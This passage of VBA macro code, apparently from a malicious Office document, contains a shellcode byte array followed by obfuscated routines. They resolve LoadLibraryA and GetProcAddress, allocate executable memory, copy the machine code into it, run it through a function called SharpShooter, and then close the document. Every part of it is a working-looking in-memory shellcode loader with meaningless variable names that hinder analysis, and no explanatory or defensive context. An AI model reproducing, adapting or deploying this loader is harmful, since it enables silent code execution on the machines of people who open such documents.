&HC7, &H44, &H24, &H30, &H0, &H0, &H0, &H0, &HC7, &H44, &H24, &H28, &H0, &H0, &H0, &H0, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H45, &H33, &HC0, &H48, &H8D, &H94, &H24, &HE0, &H1, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &H68, &H3, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &H10, &H3, &H0, &H0, &H33, &HC9, &HFF, &H54, &H24, &H68, &H89, &H84, &H24, &HD0, &H3, &H0, &H0, &H83, &HBC, &H24, &HD0, &H3, &H0, &H0, &H0, &H7C, &H55, &HC6, &H84, &H24, &HC0, &H4, &H0, &H0, &H6F, &HC6, &H84, &H24, &HC1, &H4, &H0, &H0, &H70, &HC6, &H84, &H24, &HC2, &H4, &H0, &H0, &H65, &HC6, &H84, &H24, &HC3, &H4, &H0, &H0, &H6E, &HC6, &H84, &H24, &HC4, &H4, &H0, &H0, _
&H0, &HC7, &H44, &H24, &H28, &H1, &H0, &H0, &H0, &H48, &HC7, &H44, &H24, &H20, &H0, &H0, &H0, &H0, &H45, &H33, &HC9, &H4C, &H8D, &H84, &H24, &H90, &H0, &H0, &H0, &H48, &H8D, &H94, &H24, &HC0, &H4, &H0, &H0, &H33, &HC9, &HFF, &H94, &H24, &HC0, &H3, &H0, &H0, &H48, &H8D, &H8C, &H24, &HC8, &H1, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H8C, &H24, &HB0, &H3, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H4C, &H24, &H70, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H8D, &H8C, &H24, &H20, &H4, &H0, &H0, &HFF, &H94, &H24, &H80, &H0, &H0, &H0, &H48, &H81, &HC4, &HD8, &H4, &H0, &H0, &HC3, &HCC, &HCC)
'``````````````````````````````````````````````````````````````````````````````````
    Dim gweasdf As LongPtr, qwdzxcv As LongPtr, wetqdawe As LongPtr
    Dim rising_sun As String
    rising_sun = "kernel32"
    gweasdf = ennfiaje(rising_sun)
    qwdzxcv = dnnaigej(gweasdf, "LoadLibraryA")
    wetqdawe = dnnaigej(gweasdf, "GetProcAddress")
    Dim twefasfg As Long, rgggsdfa As Long
    twefasfg = 1265
    rgggsdfa = 1283
'``````````````````````````````````````````````````````````````````````````````````
    Dim eIndex1 As Long, eIndex2 As Long, eValue As Long
    Dim vAddress As LongPtr, Result As LongPtr
    vAddress = efasdv(0, yefawfq, &H1000, &H40)
    yefawfq = 0
'``````````````````````````````````````````````````````````````````````````````````
    For eIndex1 = 0 To BlockCount - 1
        For eIndex2 = 0 To UBound(llsodiplo(eIndex1))
            eValue = llsodiplo(eIndex1)(eIndex2)
            grqwasf(yefawfq) = eValue
            yefawfq = yefawfq + 1
        Next eIndex2
    Next eIndex1
'``````````````````````````````````````````````````````````````````````````````````
    Result = gzsdfasd(VarPtr(grqwasf(twefasfg)), qwdzxcv, 8)
    Result = gzsdfasd(VarPtr(grqwasf(rgggsdfa)), wetqdawe, 8)
'``````````````````````````````````````````````````````````````````````````````````
    For eIndex1 = 0 To yefawfq - 1
        eValue = grqwasf(eIndex1)
        Result = gzsdfasd(vAddress + eIndex1, eValue, 1)
    Next eIndex1
    Dim LMCooperator As Long
    LMCooperator = SharpShooter(vAddress, 0, 0)
    ThisDocument.Close
    Exit Sub
LoneSpirit:
End Sub